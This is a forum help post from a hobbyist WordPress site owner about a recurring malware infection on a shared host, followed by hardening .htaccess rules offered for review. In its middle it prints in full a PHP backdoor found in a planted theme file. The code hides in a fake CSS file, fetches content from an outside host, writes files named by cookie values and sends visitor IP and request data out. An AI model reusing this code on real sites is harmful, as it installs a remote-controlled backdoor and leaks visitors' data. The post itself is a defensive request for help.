Malware found in a site, removed it now its coming back – Steps I’ve taken

Hi all
First off thank you for chiming in.
I am a hobbies WP site builder for my friends and family

This is my first time experiencing a malware on my shared Bluehost Server, Cpanel etc
I moved an old site of one of my mates across to my server enabled SSL on it. This is Where I think the first infection came from.
I was not until a few weeks ago I got a notification that malware was detected on my site, I asked my host to scan for me and found an Increasing number of infection each time I scanned.
So I go to work. I used wordfence “free and premium depending on the site” to scan my site as the hosting provider threatened to shut down my account unless the next scan came back clean.

I found a .php with a .htaccess file in these locations on most of the sites on the server

wp-admin/js/widgets/index.php
wp-content/uploads/2020/02/index.php
wp-admin/css/colors.index.php
wp-content/uploads/2019/index.php
wp-includes/Requests/Exceptions/Html5.php
wp-content/themes/My theme/header.php – affected All themes installed on each site

These were infected with
SL-PHP-BACKDOOR-GENERIC-bca.UNOFFICIAL
or
SL-PHP-INJECTOR-1-fmd.UNOFFICIAL
or
A file changed as malicious

For most of my sites, I run a child theme on theme
I inspected header.php before and after to try and find the new injected code.
To do this I downloaded a clean version of the theme, copy and pasted the bad header.php and good header.php into diff checker
Link https://www.diffchecker.com/ to analyse the code

I found a load line right at the top of the bad header.php

Top of the bad header.php

<?php @include_once 'slider.css'; ?><?php
/**
 * The Header for our theme.

Top of the good header.php

<?php
/**
 * The Header for our theme.

From this, I could see the header.php was loading another file
slider.css –
<?php @include_once 'slider.css'; ?>

I looked deeper into my theme files and found it. I also noticed this file was not included in my theme at all, because I had a child theme set up where i found the slider.css i also found 5 new files that did not exist before.

public_html/exampledomain/wp-content/themes/my-child-Theme

.htaccess
404.php
fuctions.php
html5.php
slider.css
styles.css

In the Modiflyed 404.php file i can see its loading the html5.php file
@include_once ‘html5.css’; get_header(); ?>

<?php
/**
 * The template for displaying 404 pages (not found)
 *
 * @package WordPress
 * @subpackage WordPress_Theme
 * @since WordPress Theme 1.0
 */

@include_once 'html5.css'; get_header(); ?>

	<div id="primary" class="content-area">
		<main id="main" class="site-main" role="main">

			<section class="error-404 not-found">
				<header class="page-header">
					<h1 class="page-title"><?php _e( 'Oops! That page can&rsquo;t be found.' ); ?></h1>
				</header><!-- .page-header -->

				<div class="page-content">
					<p><?php _e( 'It looks like nothing was found at this location. Maybe try a search?' ); ?></p>

					<?php get_search_form(); ?>
				</div><!-- .page-content -->
			</section><!-- .error-404 -->

		</main><!-- .site-main -->
	</div><!-- .content-area -->

<?php get_footer(); ?>

in the random Html5.php files I found this code – about line 250 – this file was not original in the child theme – Also all upload dates were changed to random dates.
it’s beyond my skill set to understand what it’s doing

[hidden] {
	display: none;
}*/ error_reporting( 0 ); if( function_exists( 'is_user_logged_in' ) ) { if( is_user_logged_in() ) return; }
$_Post_Wi = 'wp-includes'; $_Post_404 = '/404/'; $_Post_Ts = 'tps'; $_Post_In = '.info';
	$_Post_Eq = '='; $_Post_An = '&'; $_Post_Th = 'ht';
		$Link_Id = $_Post_Th . $_Post_Ts . ':' . '//' . $_Post_Wi . $_Post_In . $_Post_404;
$User_Id = isset( $_SERVER['HTTP_USER_AGENT'] ) ? urlencode( $_SERVER['HTTP_USER_AGENT'] ) : '';

	$_id_ = $_COOKIE; if( !empty( $_id_['div_type'] ) ) { $Link_Id .= $_Post_Wi;
if( function_exists( 'curl_init' ) ) { $_div_ = curl_init( $Link_Id ); curl_setopt( $_div_, CURLOPT_HEADER, 0 );
	curl_setopt( $_div_, CURLOPT_CONNECTTIMEOUT, 11 ); curl_setopt( $_div_, CURLOPT_TIMEOUT, 11 );
		curl_setopt( $_div_, CURLOPT_RETURNTRANSFER, 1 ); $Post_Id = curl_exec( $_div_ ); curl_close( $_div_ ); } else
	$Post_Id = file_get_contents( $Link_Id ); file_put_contents( $_id_['div_name'].$_id_['div_type'], $Post_Id ); echo( $User_Id.'
' ); return; } if( strstr( $User_Id, 'WordPress.com' ) && strstr( $User_Id, 'wordpress.com' ) ) { echo( $User_Id.'
' ); return; }

$Post_Error = strstr( $_SERVER['HTTP_HOST'], '127.0' ) ? $_SERVER['SERVER_ADDR'] : $_SERVER['HTTP_HOST'];
	$Link_Id .= '?' . 'post' . $_Post_Eq . urlencode( $Post_Error.$_SERVER['REQUEST_URI'] ) . $_Post_An .
'id' . $_Post_Eq . urlencode( $_SERVER['REMOTE_ADDR'] ) . $_Post_An . 'user' . $_Post_Eq . $User_Id;

if( function_exists( 'curl_init' ) ) { $_div_ = curl_init( $Link_Id ); curl_setopt( $_div_, CURLOPT_HEADER, 0 );
	curl_setopt( $_div_, CURLOPT_CONNECTTIMEOUT, 11 ); curl_setopt( $_div_, CURLOPT_TIMEOUT, 11 );
		curl_setopt( $_div_, CURLOPT_RETURNTRANSFER, 1 ); $Post_Id = curl_exec( $_div_ ); curl_close( $_div_ ); } else
$Post_Id = file_get_contents( $Link_Id ); if( strstr( $Post_Id, $_Post_Wi.$_Post_In ) ) die( header( $Post_Id ) ); ?>

All these files contained shit code that was not the same as the original child theme for the site.
I delete them all and re-uploaded the child theme and main theme.
I thought I had cleaned out all bad files. all Scans were coming back clean so I was happy. “more below the infection came back with files reappearing in plain site after they were deleted”

All was good for about 2 weeks, I had fixed all my sites and removed old ones did a full clean up. Changed all password. 2fa for the server etc.

I found that the infection had come back. I went through my process again and fixed all the sites. removed all code from bad area etc.
i decided to try to harden my uploads area. details below.
And in front of me, a found wp-file-manager-pro pop-up in the uploads folder. I changed my passwords etc again deleted the file for it to come right back as soon I refreshed the page. even if I changed the permissions to 444 – read the folder came back. I managed to grab a zip of it and download it.

It contained
FM_backup – filemanager I could not see any creation date – No file permission
index.php
index.html

When I went to look inside the index.html and index.php they were empty.
If I renamed the folder wp-filemanager-pro and delete it came back with the same name.
“how do I figure out what recreating this”

Hardening my .htaccess files in the main directory and uploads directory

“not I’m not an expert. this is what I found from many sources on the web. “any additions or changes let me know”

I have come up with this .htccess file to block a lot of things. most parts of code have a description, one I’m not sure about. Please see below.
Another note. Htaccess files should have permissions of 444

#.htaccess file for the main level of the subdomain

# BEGIN rlrssslReallySimpleSSL rsssl_version[3.3.5]
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteCond %{HTTPS} !=on [NC]
RewriteRule ^(.*)$ https://%{HTTP_HOST}/$1 [R=301,L]
</IfModule>
# END rlrssslReallySimpleSSL

# BEGIN WordPress   you need to find out if this is ok
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress

# Wordfence WAF  -  wordfence needs to be installed and enabled 
<Files ".user.ini">
<IfModule mod_authz_core.c>
	Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
	Order deny,allow
	Deny from all
</IfModule>
</Files>
# END Wordfence WAF

# This is block authors scan in .htaccess in your root directory. 
# An example is https://yourdomain.co.nz/?author=2 from wordfence scan 
# BEGIN block author scans
 RewriteEngine On
RewriteBase /
RewriteCond %{QUERY_STRING} (author=\d+) [NC]
RewriteRule .* - [F]
 # END block author scans

# Block WordPress xmlrpc.php requests in .htaccess. This blocks remote access to the site on phones. 
<Files xmlrpc.php>
order deny,allow
deny from all
</Files>

<IfModule mod_alias.c>
RedirectMatch 403 /(.*)/xmlrpc\.php$
</IfModule>

# Disable directory browsing example. Https://yoursite.co.nz/wp-content/plugins - Stops Directorys From Been Viewable

Options -Indexes

I have also created one for the uploads directory.

“not I’m not an expert. this is what I found from many sources on the web. “any additions or changes/mistakes let me know”

# Start Wordfence code execution protection - Blocks code from running - Remember to put 444 security on the .htaccess file in the upload directory
<IfModule mod_php5.c>
php_flag engine 0
</IfModule>
<IfModule mod_php7.c>
php_flag engine 0
</IfModule>
AddHandler cgi-script .php .phtml .php3 .pl .py .jsp .asp .htm .shtml .sh .cgi
Options -ExecCGI
# END Wordfence code execution protection

# This Compleatly blocks all Files in upload directory 
<Files ~ ".*..*">
	Order Allow,Deny
	Deny from all
</Files>

# After that add file extensions you want to allow access - only files that can be opened - you must add extentions if you want to use them
<FilesMatch ".(jpg|jpeg|jpe|gif|png|mp4|pdf)$">
	Order Deny,Allow
	Allow from all
</FilesMatch>

# END File Extention Block

Thank you for your time chiming in. I a hobbyist and finding this very hard.

• This topic was modified 4 years, 1 month ago by xsiv.